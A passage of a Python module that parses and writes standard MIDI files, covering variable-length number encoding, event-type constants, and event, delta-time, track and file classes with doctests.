    # bytes iteration already yields ints on PY3; chars need ord()
    return [item if is_num(item) else ord(item) for item in midi_str]

def put_number(num, length):
    '''
    Pack `num` big-endian into exactly `length` bytes.

    >>> put_number(3, 4)
    b'\\x00\\x00\\x00\\x03'
    >>> put_number(0, 1)
    b'\\x00'
    '''
    # shifts run from the most-significant byte position down to 0
    shifts = range(8 * (length - 1), -1, -8)
    return bytes((num >> s) & 0xFF for s in shifts)

def put_variable_length_number(num):
    '''
    Encode a non-negative integer as a MIDI variable-length quantity:
    7 data bits per byte, high bit set on every byte except the last.

    >>> put_variable_length_number(4)
    b'\\x04'
    >>> put_variable_length_number(127)
    b'\\x7f'
    >>> put_variable_length_number(0)
    b'\\x00'
    >>> put_variable_length_number(1024)
    b'\\x88\\x00'
    >>> put_variable_length_number(8192)
    b'\\xc0\\x00'
    >>> put_variable_length_number(16383)
    b'\\xff\\x7f'
    >>> put_variable_length_number(-1)
    Traceback (most recent call last):
    MidiException: cannot put_variable_length_number() when number is negative: -1
    '''
    if num < 0:
        raise MidiException(
            'cannot put_variable_length_number() when number is negative: %s' % num)
    encoded = bytearray()
    is_last_byte = True
    while True:
        septet = num & 0x7F
        # only the final (least-significant) byte has the high bit clear
        encoded.insert(0, septet if is_last_byte else septet | 0x80)
        is_last_byte = False
        num >>= 7
        if not num:
            break
    return bytes(encoded)

def put_numbers_as_list(num_list):
    '''
    Translate a list of numbers (0-255) into a bytestring.
    Used for encoding data messages where each byte encodes a different discrete value.

    >>> put_numbers_as_list([0, 0, 0, 3])
    b'\\x00\\x00\\x00\\x03'

    If a number is < 0 then it wraps around from the top.
    >>> put_numbers_as_list([0, 0, 0, -3])
    b'\\x00\\x00\\x00\\xfd'
    >>> put_numbers_as_list([0, 0, 0, -1])
    b'\\x00\\x00\\x00\\xff'

    A number > 255 is an exception:
    >>> put_numbers_as_list([256])
    Traceback (most recent call last):
    MidiException: Cannot place a number > 255 in a list: 256
    '''
    encoded = bytearray()
    for value in num_list:
        if value < 0:
            value = value % 256 # -1 wraps to 255
        if value >= 256:
            raise MidiException("Cannot place a number > 255 in a list: %d" % value)
        encoded.append(value)
    return bytes(encoded)

#-------------------------------------------------------------------------------
class Enumeration(object):
    '''
    Utility object for defining binary MIDI message constants.

    Takes a list of names or (name, value) tuples; a bare name is
    assigned the value following the previous entry's value.
    '''
    def __init__(self, enum_list=None):
        if enum_list is None:
            enum_list = []
        lookup = {}
        reverse_lookup = {}
        num = 0
        # sets (not lists) for O(1) duplicate detection
        unique_names = set()
        unique_values = set()
        for enum in enum_list:
            if isinstance(enum, tuple):
                enum, num = enum
            if not isinstance(enum, str):
                # BUG FIX: was "..." + enum, which raises TypeError for any
                # non-str value instead of the intended EnumerationException
                raise EnumerationException("enum name is not a string: %r" % (enum,))
            if not isinstance(num, int):
                # BUG FIX: was "..." + num (str + int -> TypeError)
                raise EnumerationException("enum value is not an integer: %r" % (num,))
            if enum in unique_names:
                raise EnumerationException("enum name is not unique: " + enum)
            if num in unique_values:
                raise EnumerationException("enum value is not unique for " + enum)
            unique_names.add(enum)
            unique_values.add(num)
            lookup[enum] = num
            reverse_lookup[num] = enum
            num = num + 1
        self.lookup = lookup          # name -> value
        self.reverse_lookup = reverse_lookup  # value -> name

    def __add__(self, other):
        # merge the two enumerations; duplicates raise in the constructor
        lst = [(k, v) for k, v in self.lookup.items()]
        lst += [(k, v) for k, v in other.lookup.items()]
        return Enumeration(lst)

    def hasattr(self, attr):
        '''Return True if `attr` is a defined name.'''
        return attr in self.lookup

    def has_value(self, attr):
        '''Return True if `attr` is a defined value.'''
        return attr in self.reverse_lookup

    def __getattr__(self, attr):
        if attr not in self.lookup:
            raise AttributeError
        return self.lookup[attr]

    def whatis(self, value):
        '''Return the name bound to `value`; KeyError if unknown.'''
        return self.reverse_lookup[value]

# Channel voice message status bytes: the high nybble is the command;
# the low nybble (added when encoding) carries the 0-based channel.
CHANNEL_VOICE_MESSAGES = Enumeration([
    ("NOTE_OFF", 0x80),
    ("NOTE_ON", 0x90),
    ("POLYPHONIC_KEY_PRESSURE", 0xA0),
    ("CONTROLLER_CHANGE", 0xB0),
    ("PROGRAM_CHANGE", 0xC0),
    ("CHANNEL_KEY_PRESSURE", 0xD0),
    ("PITCH_BEND", 0xE0)])

# Channel mode messages: sent as CONTROLLER_CHANGE (0xB0) with these
# reserved controller numbers as the second byte.
CHANNEL_MODE_MESSAGES = Enumeration([
    ("ALL_SOUND_OFF", 0x78),
    ("RESET_ALL_CONTROLLERS", 0x79),
    ("LOCAL_CONTROL", 0x7A),
    ("ALL_NOTES_OFF", 0x7B),
    ("OMNI_MODE_OFF", 0x7C),
    ("OMNI_MODE_ON", 0x7D),
    ("MONO_MODE_ON", 0x7E),
    ("POLY_MODE_ON", 0x7F)])

# Meta event type bytes: follow an 0xFF status byte in a MIDI file.
META_EVENTS = Enumeration([
    ("SEQUENCE_NUMBER", 0x00),
    ("TEXT_EVENT", 0x01),
    ("COPYRIGHT_NOTICE", 0x02),
    ("SEQUENCE_TRACK_NAME", 0x03),
    ("INSTRUMENT_NAME", 0x04),
    ("LYRIC", 0x05),
    ("MARKER", 0x06),
    ("CUE_POINT", 0x07),
    ("PROGRAM_NAME", 0x08),
    # optional event is used to embed the
    # patch/program name that is called up by the immediately
    # subsequent Bank Select and Program Change messages.
    # It serves to aid the end user in making an intelligent
    #  program choice when using different hardware.
    ("SOUND_SET_UNSUPPORTED", 0x09),
    ("MIDI_CHANNEL_PREFIX", 0x20),
    ("MIDI_PORT", 0x21),
    ("END_OF_TRACK", 0x2F),
    ("SET_TEMPO", 0x51),
    ("SMTPE_OFFSET", 0x54),
    ("TIME_SIGNATURE", 0x58),
    ("KEY_SIGNATURE", 0x59),
    ("SEQUENCER_SPECIFIC_META_EVENT", 0x7F)])

#-------------------------------------------------------------------------------
class MidiEvent(object):
    '''
    A model of a MIDI event, including note-on, note-off, program change,
    controller change, and many others.
    MidiEvent objects are paired (preceded) by :class:`~base.DeltaTime`
    objects in the list of events in a MidiTrack object.
    The `track` argument must be a :class:`~base.MidiTrack` object.
    The `type_` attribute is a string representation of a Midi event from the CHANNEL_VOICE_MESSAGES
    or META_EVENTS definitions.
    The `channel` attribute is an integer channel id, from 1 to 16.
    The `time` attribute is an integer duration of the event in ticks. This value
    can be zero. This value is not essential, as ultimate time positioning is
    determined by :class:`~base.DeltaTime` objects.
    The `pitch` attribute is only defined for note-on and note-off messages.
    The attribute stores an integer representation (0-127, with 60 = middle C).
    The `velocity` attribute is only defined for note-on and note-off messages.
    The attribute stores an integer representation (0-127).  A note-on message with
    velocity 0 is generally assumed to be the same as a note-off message.
    The `data` attribute is used for storing other messages,
    such as SEQUENCE_TRACK_NAME string values.

    >>> mt = MidiTrack(1)
    >>> me1 = MidiEvent(mt)
    >>> me1.type_ = "NOTE_ON"
    >>> me1.channel = 3
    >>> me1.time = 200
    >>> me1.pitch = 60
    >>> me1.velocity = 120
    >>> me1
    <MidiEvent NOTE_ON, t=200, track=1, channel=3, pitch=60, velocity=120>
    >>> me2 = MidiEvent(mt)
    >>> me2.type_ = "SEQUENCE_TRACK_NAME"
    >>> me2.time = 0
    >>> me2.data = 'guitar'
    >>> me2
    <MidiEvent SEQUENCE_TRACK_NAME, t=0, track=1, channel=None, data=b'guitar'>
    '''
    def __init__(self, track, type_=None, time=None, channel=None):
        self.track = track
        self.type_ = type_
        self.time = time
        self.channel = channel

        self._parameter1 = None # pitch or first data value
        self._parameter2 = None # velocity or second data value

        # data is a property...

        # if this is a Note on/off, need to store original
        # pitch space value in order to determine if this is has a microtone
        self.cent_shift = None

        # store a reference to a corresponding event
        # if a noteOn, store the note off, and vice versa
        # NTODO: We should make sure that we garbage collect this -- otherwise it's a memory
        # leak from a circular reference.
        # note: that's what weak references are for
        # unimplemented
        self.corresponding_event = None

        # store and pass on a running status if found
        self.last_status_byte = None

        self.sort_order = 0
        self.update_sort_order()

    def update_sort_order(self):
        '''Give pitch bends and note-offs priority when sorting simultaneous events.'''
        if self.type_ == 'PITCH_BEND':
            self.sort_order = -10
        if self.type_ == 'NOTE_OFF':
            self.sort_order = -20

    def __repr__(self):
        if self.track is None:
            track_index = None
        else:
            track_index = self.track.index

        return_str = ("<MidiEvent %s, t=%s, track=%s, channel=%s" %
             (self.type_, repr(self.time), track_index,
              repr(self.channel)))
        if self.type_ in ['NOTE_ON', 'NOTE_OFF']:
            attr_list = ["pitch", "velocity"]
        else:
            if self._parameter2 is None:
                attr_list = ['data']
            else:
                attr_list = ['_parameter1', '_parameter2']

        for attrib in attr_list:
            if getattr(self, attrib) is not None:
                return_str = return_str + ", " + attrib + "=" + repr(getattr(self, attrib))
        return return_str + ">"

    def _set_pitch(self, value):
        self._parameter1 = value

    def _get_pitch(self):
        # pitch is only meaningful for note messages
        if self.type_ in ['NOTE_ON', 'NOTE_OFF']:
            return self._parameter1
        else:
            return None

    pitch = property(_get_pitch, _set_pitch)

    def _set_velocity(self, value):
        self._parameter2 = value

    def _get_velocity(self):
        return self._parameter2

    velocity = property(_get_velocity, _set_velocity)

    def _set_data(self, value):
        # normalize str to utf-8 bytes; other types pass through unchanged
        if value is not None and not isinstance(value, bytes):
            if isinstance(value, str):
                value = value.encode('utf-8')
        self._parameter1 = value

    def _get_data(self):
        return self._parameter1

    data = property(_get_data, _set_data)

    def set_pitch_bend(self, cents, bend_range=2):
        '''
        Treat this event as a pitch bend value, and set the ._parameter1 and
         ._parameter2 fields appropriately given a specified bend value in cents.

        The `bend_range` parameter gives the number of half steps in the bend range.

        >>> mt = MidiTrack(1)
        >>> me1 = MidiEvent(mt)
        >>> me1.set_pitch_bend(50)
        >>> me1._parameter1, me1._parameter2
        (0, 80)
        >>> me1.set_pitch_bend(100)
        >>> me1._parameter1, me1._parameter2
        (0, 96)
        >>> me1.set_pitch_bend(200)
        >>> me1._parameter1, me1._parameter2
        (127, 127)
        >>> me1.set_pitch_bend(-50)
        >>> me1._parameter1, me1._parameter2
        (0, 48)
        >>> me1.set_pitch_bend(-100)
        >>> me1._parameter1, me1._parameter2
        (0, 32)
        '''
        # value range is 0, 16383
        # center should be 8192
        cent_range = bend_range * 100
        center = 8192
        top_span = 16383 - center
        bottom_span = center

        if cents > 0:
            shift_scalar = cents / float(cent_range)
            shift = int(round(shift_scalar * top_span))
        elif cents < 0:
            shift_scalar = cents / float(cent_range) # will be negative
            shift = int(round(shift_scalar * bottom_span)) # will be negative
        else:
            shift = 0
        target = center + shift

        # produce a two-char value
        char_value = put_variable_length_number(target)
        data1, _ = get_number(char_value[0], 1)
        # need to convert from 8 bit to 7, so using & 0x7F
        data1 = data1 & 0x7F
        if len(char_value) > 1:
            data2, _ = get_number(char_value[1], 1)
            data2 = data2 & 0x7F
        else:
            data2 = 0

        self._parameter1 = data2
        self._parameter2 = data1 # data1 is msb here

    def _parse_channel_voice_message(self, midi_str):
        '''

        >>> mt = MidiTrack(1)
        >>> me1 = MidiEvent(mt)
        >>> remainder = me1._parse_channel_voice_message(ints_to_hex_string([144, 60, 120]))
        >>> me1.channel
        1
        >>> remainder = me1._parse_channel_voice_message(ints_to_hex_string([145, 60, 120]))
        >>> me1.channel
        2
        >>> me1.type_
        'NOTE_ON'
        >>> me1.pitch
        60
        >>> me1.velocity
        120
        '''
        # first_byte, channel_number, and second_byte define
        # characteristics of the first two chars
        # for first_byte: The left nybble (4 bits) contains the actual command, and the right nibble
        # contains the midi channel number on which the command will be executed.
        if is_num(midi_str[0]):
            first_byte = midi_str[0]
        else:
            first_byte = ord(midi_str[0])
        channel_number = first_byte & 0xF0
        if is_num(midi_str[1]):
            second_byte = midi_str[1]
        else:
            second_byte = ord(midi_str[1])
        if is_num(midi_str[2]):
            third_byte = midi_str[2]
        else:
            third_byte = ord(midi_str[2])

        self.channel = (first_byte & 0x0F) + 1
        self.type_ = CHANNEL_VOICE_MESSAGES.whatis(channel_number)
        if (self.type_ == "PROGRAM_CHANGE" or
                self.type_ == "CHANNEL_KEY_PRESSURE"):
            # single data byte messages
            self.data = second_byte
            return midi_str[2:]
        elif self.type_ == "CONTROLLER_CHANGE":
            # for now, do nothing with this data
            # for a note, str[2] is velocity; here, it is the control value
            self.pitch = second_byte # this is the controller id
            self.velocity = third_byte # this is the controller value
            return midi_str[3:]
        else:
            self.pitch = second_byte
            self.velocity = third_byte
            return midi_str[3:]

    def read(self, time, midi_str):
        '''
        Parse the string that is given and take the beginning
        section and convert it into data for this event and return the
        now truncated string.
        The `time` value is the number of ticks into the Track
        at which this event happens. This is derived from reading
        data the level of the track.
        TODO: These instructions are inadequate.
        >>> # all note-on messages (144-159) can be found
        >>> 145 & 0xF0 # testing message type_ extraction
        144
        >>> 146 & 0xF0 # testing message type_ extraction
        144
        >>> (144 & 0x0F) + 1 # getting the channel
        1
        >>> (159 & 0x0F) + 1 # getting the channel
        16
        '''
        if len(midi_str) < 2:
            # often what we have here are null events:
            # the string is simply: 0x00
            print(
                'MidiEvent.read(): got bad data string',
                'time',
                time,
                'str',
                repr(midi_str))
            return ''

        # first_byte, message_type, and second_byte define
        # characteristics of the first two chars
        # for first_byte: The left nybble (4 bits) contains the
        # actual command, and the right nibble
        # contains the midi channel number on which the command will
        # be executed.
        if is_num(midi_str[0]):
            first_byte = midi_str[0]
        else:
            first_byte = ord(midi_str[0])

        # detect running status: if the status byte is less than 128, its
        # not a status byte, but a data byte
        if first_byte < 128:
            if self.last_status_byte is not None:
                rsb = self.last_status_byte
                if is_num(rsb):
                    rsb = bytes([rsb])
            else:
                # default to NOTE_ON channel 1 when no status has been seen
                rsb = bytes([0x90])
            # add the running status byte to the front of the string
            # and process as before
            midi_str = rsb + midi_str
            if is_num(midi_str[0]):
                first_byte = midi_str[0]
            else:
                first_byte = ord(midi_str[0])
        else:
            self.last_status_byte = midi_str[0]

        message_type = first_byte & 0xF0

        if is_num(midi_str[1]):
            second_byte = midi_str[1]
        else:
            second_byte = ord(midi_str[1])

        if CHANNEL_VOICE_MESSAGES.has_value(message_type):
            return self._parse_channel_voice_message(midi_str)

        elif message_type == 0xB0 and CHANNEL_MODE_MESSAGES.has_value(second_byte):
            self.channel = (first_byte & 0x0F) + 1
            self.type_ = CHANNEL_MODE_MESSAGES.whatis(second_byte)
            if self.type_ == "LOCAL_CONTROL":
                self.data = (ord(midi_str[2]) == 0x7F)
            elif self.type_ == "MONO_MODE_ON":
                self.data = ord(midi_str[2])
            else:
                print('unhandled message:', midi_str[2])
            return midi_str[3:]

        elif first_byte == 0xF0 or first_byte == 0xF7:
            self.type_ = {0xF0: "F0_SYSEX_EVENT",
                         0xF7: "F7_SYSEX_EVENT"}[first_byte]
            length, midi_str = get_variable_length_number(midi_str[1:])
            self.data = midi_str[:length]
            return midi_str[length:]

        # SEQUENCE_TRACK_NAME and other MetaEvents are here
        elif first_byte == 0xFF:
            if not META_EVENTS.has_value(second_byte):
                print("unknown meta event: FF %02X" % second_byte)
                sys.stdout.flush()
                raise MidiException("Unknown midi event type_: %r, %r" % (first_byte, second_byte))
            self.type_ = META_EVENTS.whatis(second_byte)
            length, midi_str = get_variable_length_number(midi_str[2:])
            self.data = midi_str[:length]
            return midi_str[length:]
        else:
            # an uncaught message
            print(
                'got unknown midi event type_',
                repr(first_byte),
                'char_to_binary(midi_str[0])',
                char_to_binary(midi_str[0]),
                'char_to_binary(midi_str[1])',
                char_to_binary(midi_str[1]))
            raise MidiException("Unknown midi event type_")


    def get_bytes(self):
        '''
        Return the encoded bytes for this MIDI event.

        Raises MidiException when the stored parameters cannot be
        represented as single bytes or the event type is unknown.
        '''
        # BUG FIX: the channel-voice and channel-mode branches previously
        # built their results with chr(), returning str on Python 3 while
        # the sysex/meta branches returned bytes; all branches now return
        # bytes so the results can be concatenated with DeltaTime bytes.
        sysex_event_dict = {"F0_SYSEX_EVENT": 0xF0,
                            "F7_SYSEX_EVENT": 0xF7}
        if CHANNEL_VOICE_MESSAGES.hasattr(self.type_):
            return_bytes = bytes([(self.channel - 1) +
                    getattr(CHANNEL_VOICE_MESSAGES, self.type_)])
            # for writing note-on/note-off
            if self.type_ not in [
                    'PROGRAM_CHANGE', 'CHANNEL_KEY_PRESSURE']:
                # a two-byte payload, like b'\x00\x00'
                try:
                    data = bytes([self._parameter1, self._parameter2])
                except (ValueError, TypeError):
                    raise MidiException(
                        "Problem with representing either %r or %r" % (
                            self._parameter1, self._parameter2))
            elif self.type_ in ['PROGRAM_CHANGE']:
                try:
                    data = bytes([self.data])
                except (ValueError, TypeError):
                    # BUG FIX: format placeholders were a garbled
                    # "%return_bytes" from a bad rename; use %r
                    raise MidiException(
                        "Got incorrect data for %r in .data: %r," %
                            (self, self.data) + "cannot parse Program Change")
            else:
                try:
                    data = bytes([self.data])
                except (ValueError, TypeError):
                    # BUG FIX: same garbled "%return_bytes" placeholders
                    raise MidiException(
                        ("Got incorrect data for %r in "
                         ".data: %r, ") % (self, self.data) +
                        "cannot parse Miscellaneous Message")
            return return_bytes + data

        elif CHANNEL_MODE_MESSAGES.hasattr(self.type_):
            controller_number = getattr(CHANNEL_MODE_MESSAGES, self.type_)
            return bytes([0xB0 + (self.channel - 1),
                          controller_number,
                          self.data])

        elif self.type_ in sysex_event_dict:
            return_bytes = bytes([sysex_event_dict[self.type_]])
            return_bytes = return_bytes + put_variable_length_number(len(self.data))
            return return_bytes + self.data

        elif META_EVENTS.hasattr(self.type_):
            return_bytes = bytes([0xFF]) + bytes([getattr(META_EVENTS, self.type_)])
            return_bytes = return_bytes + put_variable_length_number(len(self.data))

            try:
                return return_bytes + self.data
            except (UnicodeDecodeError, TypeError):
                # fall back to an ASCII approximation of the text payload
                return return_bytes + unicodedata.normalize(
                    'NFKD', self.data).encode('ascii', 'ignore')
        else:
            # BUG FIX: was "%return_bytes" (parsed as %r + literal text)
            raise MidiException("unknown midi event type_: %r" % self.type_)

    #---------------------------------------------------------------------------
    def is_note_on(self):
        '''
        Return a boolean: is this a NOTE_ON message with non-zero velocity?

        >>> mt = MidiTrack(1)
        >>> me1 = MidiEvent(mt)
        >>> me1.type_ = "NOTE_ON"
        >>> me1.velocity = 120
        >>> me1.is_note_on()
        True
        >>> me1.is_note_off()
        False
        '''
        return self.type_ == "NOTE_ON" and self.velocity != 0

    def is_note_off(self):
        '''
        Return a boolean if this is should be interpreted as a note-off message,
        either as a real note-off or as a note-on with zero velocity.

        >>> mt = MidiTrack(1)
        >>> me1 = MidiEvent(mt)
        >>> me1.type_ = "NOTE_OFF"
        >>> me1.is_note_on()
        False
        >>> me1.is_note_off()
        True
        >>> me2 = MidiEvent(mt)
        >>> me2.type_ = "NOTE_ON"
        >>> me2.velocity = 0
        >>> me2.is_note_on()
        False
        >>> me2.is_note_off()
        True
        '''
        if self.type_ == "NOTE_OFF":
            return True
        elif self.type_ == "NOTE_ON" and self.velocity == 0:
            return True
        return False

    def is_delta_time(self):
        '''
        Return a boolean if this is a DeltaTime subclass.

        >>> mt = MidiTrack(1)
        >>> dt = DeltaTime(mt)
        >>> dt.is_delta_time()
        True
        '''
        if self.type_ == "DeltaTime":
            return True
        return False

    def matched_note_off(self, other):
        '''
        Returns True if `other` is a MIDI event that specifies
        a note-off message for this message.  That is, this event
        is a NOTE_ON message, and the other is a NOTE_OFF message
        for this pitch on this channel.  Otherwise returns False

        >>> mt = MidiTrack(1)
        >>> me1 = MidiEvent(mt)
        >>> me1.type_ = "NOTE_ON"
        >>> me1.velocity = 120
        >>> me1.pitch = 60
        >>> me2 = MidiEvent(mt)
        >>> me2.type_ = "NOTE_ON"
        >>> me2.velocity = 0
        >>> me2.pitch = 60
        >>> me1.matched_note_off(me2)
        True
        >>> me2.pitch = 61
        >>> me1.matched_note_off(me2)
        False
        >>> me2.type_ = "NOTE_OFF"
        >>> me1.matched_note_off(me2)
        False
        >>> me2.pitch = 60
        >>> me1.matched_note_off(me2)
        True
        >>> me2.channel = 12
        >>> me1.matched_note_off(me2)
        False
        '''
        # BUG FIX: was "if other.is_note_off:" -- a bound method is always
        # truthy, so any same-pitch/channel event (even a sounding NOTE_ON)
        # was treated as a matching note-off.  The method must be called.
        if other.is_note_off():
            # might check velocity here too?
            if self.pitch == other.pitch and self.channel == other.channel:
                return True
        return False

class DeltaTime(MidiEvent):
    '''
    A :class:`~base.MidiEvent` subclass holding the time change, in ticks,
    since the start of the track or since the previous MidiEvent.
    Temporal data is represented as pairs of DeltaTime and MidiEvent objects.
    The `track` argument must be a :class:`~base.MidiTrack` object.
    Time values are integer tick counts.
    The `channel` attribute, inherited from MidiEvent, is unused and stays
    None unless overridden (don't!).

    >>> mt = MidiTrack(1)
    >>> dt = DeltaTime(mt)
    >>> dt.time = 380
    >>> dt
    <MidiEvent DeltaTime, t=380, track=1, channel=None>
    '''
    def __init__(self, track, time=None, channel=None):
        MidiEvent.__init__(self, track, time=time, channel=channel)
        # tag the event so is_delta_time() can recognize it
        self.type_ = "DeltaTime"

    def read(self, oldstr):
        # Decode one variable-length quantity from the front of the data;
        # keep the decoded tick count on self and hand back the rest.
        ticks, remainder = get_variable_length_number(oldstr)
        self.time = ticks
        return self.time, remainder

    def get_bytes(self):
        # Encode the stored tick count back into a variable-length quantity.
        return put_variable_length_number(self.time)

class MidiTrack(object):
    '''
    A MIDI Track.
    All events (alternating :class:`~base.DeltaTime` and
    :class:`~base.MidiEvent` objects) are stored in the `events` list,
    in order.
    An `index` is an integer identifier for this object.
    `length` is the byte length of the track data; it is only set by `read()`.

    >>> mt = MidiTrack(0)

    '''
    def __init__(self, index):
        self.index = index
        self.events = []
        self.length = 0 #the data length; only used on read()

    def read(self, midi_str):
        '''
        Read as much of the string (representing midi data) as necessary;
        return the remaining string for reassignment and further processing.
        The string should begin with `MTrk`, specifying a Midi Track
        Creates and stores :class:`~base.DeltaTime`
        and :class:`~base.MidiEvent` objects.
        '''
        time = 0 # a running counter of ticks

        if not midi_str[:4] == b"MTrk":
            raise MidiException('badly formed midi string: missing leading MTrk')
        # get the 4 chars after the MTrk encoding
        length, midi_str = get_number(midi_str[4:], 4)
        self.length = length

        # all event data is in the track str
        track_str = midi_str[:length]
        remainder = midi_str[length:]

        e_previous = None
        while track_str:
            # shave off the time stamp from the event
            delta_t = DeltaTime(self)
            # return extracted time, as well as remaining string
            d_time, track_str_candidate = delta_t.read(track_str)
            # this is the offset that this event happens at, in ticks
            time_candidate = time + d_time

            # pass self to event, set this MidiTrack as the track for this event
            event = MidiEvent(self)
            if e_previous is not None: # set the last status byte
                # NOTE(review): presumably this implements MIDI "running
                # status" (events without a status byte reuse the previous
                # one) — confirm against MidiEvent.read().
                event.last_status_byte = e_previous.last_status_byte
            # some midi events may raise errors; simply skip for now
            try:
                track_str_candidate = event.read(time_candidate, track_str_candidate)
            except MidiException:
                # assume that track_str, after delta extraction, is still correct
                # set to result after taking delta time
                track_str = track_str_candidate
                continue
            # only set after trying to read, which may raise exception
            time = time_candidate
            track_str = track_str_candidate # remainder string
            # only append if we get this far; a skipped event drops its
            # DeltaTime as well, keeping `events` as strict pairs
            self.events.append(delta_t)
            self.events.append(event)
            e_previous = event

        return remainder # remainder string after extracting track data

    def get_bytes(self):
        '''
        returns a string of midi-data from the `.events` in the object.
        '''
        # build str using MidiEvents
        midi_str = b""
        for event in self.events:
            # this writes both delta time and message events
            try:
                event_bytes = event.get_bytes()
                # Normalize each element to an int before rebuilding bytes:
                # iterating bytes yields ints on Python 3 but one-character
                # strings on Python 2 — presumably why ord() is needed here;
                # TODO confirm once Python 2 support is dropped.
                int_array = []
                for byte in event_bytes:
                    if is_num(byte):
                        int_array.append(byte)
                    else:
                        int_array.append(ord(byte))
                event_bytes = bytes(bytearray(int_array))
                midi_str = midi_str + event_bytes
            except MidiException as err:
                # best-effort: a failed event is reported and skipped, not fatal
                print("Conversion error for %s: %s; ignored." % (event, err))
        return b"MTrk" + put_number(len(midi_str), 4) + midi_str

    def __repr__(self):
        '''Return a multi-line summary of this track and all of its events.'''
        return_str = "<MidiTrack %d -- %d events\n" % (self.index, len(self.events))
        for event in self.events:
            return_str = return_str + "    " + event.__repr__() + "\n"
        return return_str + "  >"

    #---------------------------------------------------------------------------
    def update_events(self):
        '''
        We may attach events to this track before setting their `track` parameter.
        This method will move through all events and set their track to this track.
        '''
        for event in self.events:
            event.track = self

    def has_notes(self):
        '''Return True/False if this track has any note-on/note-off pairs defined.
        '''
        # a single note-on is taken as evidence of note content
        for event in self.events:
            if event.is_note_on():
                return True
        return False

    def set_channel(self, value):
        '''Set the channel of all events in this Track.

        Valid channels are the integers 1-16; anything else raises
        MidiException.
        '''
        if value not in range(1, 17):
            raise MidiException('bad channel value: %s' % value)
        for event in self.events:
            event.channel = value

    def get_channels(self):
        '''Get all channels used in this Track.
        '''
        # preserves first-seen order; includes None for channel-less events
        post = []
        for event in self.events:
            if event.channel not in post:
                post.append(event.channel)
        return post

    def get_program_changes(self):
        '''Get all unique program changes used in this Track, sorted.
        '''
        # NOTE(review): docstring says "sorted" but values are returned in
        # first-seen order — confirm which is intended.
        post = []
        for event in self.events:
            if event.type_ == 'PROGRAM_CHANGE':
                if event.data not in post:
                    post.append(event.data)
        return post

class MidiFile(object):
    '''
    Low-level MIDI file reading and writing, emulating methods from normal
    Python files.
    The `ticks_per_quarter_note` attribute must be set before writing.
    1024 is a common value.
    This object is returned by some properties for directly writing files
    of midi representations.
    '''

    def __init__(self):
        self.file = None    # file (or file-like) object set by open()/open_file_like()
        self.format = 1     # midi file format; readstr() accepts only 0 or 1
        self.tracks = []    # list of MidiTrack objects
        self.ticks_per_quarter_note = 1024
        self.ticks_per_second = None  # only set for frame-based (SMPTE-style) division

    def open(self, filename, attrib="rb"):
        '''
        Open a MIDI file path for reading or writing.

        For writing to a MIDI file, `attrib` should be "wb".
        Raises MidiException for any mode other than 'rb'/'wb'.
        '''
        if attrib not in ['rb', 'wb']:
            raise MidiException('cannot read or write unless in binary mode, not:', attrib)
        self.file = open(filename, attrib)

    def open_file_like(self, file_like):
        '''Assign a file-like object, such as those provided by StringIO, as an open file object.
        >>> from io import StringIO
        >>> fileLikeOpen = StringIO()
        >>> mf = MidiFile()
        >>> mf.open_file_like(fileLikeOpen)
        >>> mf.close()
        '''
        self.file = file_like

    def __repr__(self):
        '''Return a multi-line summary of this file and all of its tracks.'''
        return_str = "<MidiFile %d tracks\n" % len(self.tracks)
        for track in self.tracks:
            return_str = return_str + "  " + track.__repr__() + "\n"
        return return_str + ">"

    def close(self):
        '''
        Close the file.
        '''
        self.file.close()

    def read(self):
        '''
        Read and parse MIDI data stored in a file.
        '''
        self.readstr(self.file.read())

    def readstr(self, midi_str):
        '''
        Read and parse MIDI data as a string, putting the
        data in `.ticks_per_quarter_note` and a list of
        `MidiTrack` objects in the attribute `.tracks`.

        Raises MidiException on a missing MThd header, a malformed header
        length, an unsupported format, or an unsupported ticks-per-frame
        value.
        '''
        if not midi_str[:4] == b"MThd":
            raise MidiException('badly formated midi string, got: %s' % midi_str[:20])

        # we step through the str src, chopping off characters as we go
        # and reassigning to str
        length, midi_str = get_number(midi_str[4:], 4)
        if length != 6:  # the MThd payload is always exactly 6 bytes
            raise MidiException('badly formated midi string')

        midi_format_type, midi_str = get_number(midi_str, 2)
        self.format = midi_format_type
        if midi_format_type not in (0, 1):
            # BUG FIX: the message previously interpolated the *builtin*
            # ``format`` function instead of the parsed value, producing
            # "<built-in function format>" in the error text.
            raise MidiException('cannot handle midi file format: %s' % midi_format_type)

        num_tracks, midi_str = get_number(midi_str, 2)
        division, midi_str = get_number(midi_str, 2)

        # very few midi files seem to define ticks_per_second
        if division & 0x8000:
            # high bit set: frame-based timing (frames/sec in the top byte,
            # ticks per frame in the bottom byte)
            frames_per_second = -((division >> 8) | -128)
            ticks_per_frame = division & 0xFF
            if ticks_per_frame not in [24, 25, 29, 30]:
                raise MidiException('cannot handle ticks per frame: %s' % ticks_per_frame)
            if ticks_per_frame == 29:
                ticks_per_frame = 30  # drop frame
            self.ticks_per_second = ticks_per_frame * frames_per_second
        else:
            self.ticks_per_quarter_note = division & 0x7FFF

        for i in range(num_tracks):
            trk = MidiTrack(i) # sets the MidiTrack index parameters
            midi_str = trk.read(midi_str) # pass all the remaining string, reassing
            self.tracks.append(trk)

    def write(self):
        '''
        Write MIDI data as a file to the file opened with `.open()`.
        '''
        self.file.write(self.writestr())

    def writestr(self):
        '''
        Generate the midi file header and convert the list of
        MidiTrack objects in `.tracks` into midi data; return it as bytes.
        '''
        midi_str = self.write_m_thd_str()
        for trk in self.tracks:
            midi_str = midi_str + trk.get_bytes()
        return midi_str

    def write_m_thd_str(self):
        '''
        Convert `.format`, `.tracks` and `.ticks_per_quarter_note` into an
        MThd midi header chunk and return it as bytes.

        Raises MidiException when `ticks_per_quarter_note` has its high bit
        set (frame-based division cannot be written).
        '''
        division = self.ticks_per_quarter_note
        # Don't handle ticks_per_second yet, too confusing
        if (division & 0x8000) != 0:
            raise MidiException(
                'Cannot write midi string unless self.ticks_per_quarter_note is a multiple of 1024')
        midi_str = b"MThd" + put_number(6, 4) + put_number(self.format, 2)
        midi_str = midi_str + put_number(len(self.tracks), 2)
        midi_str = midi_str + put_number(division, 2)
        return midi_str

if __name__ == "__main__":
    # Run this module's doctests when executed directly; ELLIPSIS lets
    # examples elide long or variable output with "...".
    import doctest
    doctest.testmod(optionflags=doctest.ELLIPSIS)

# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.


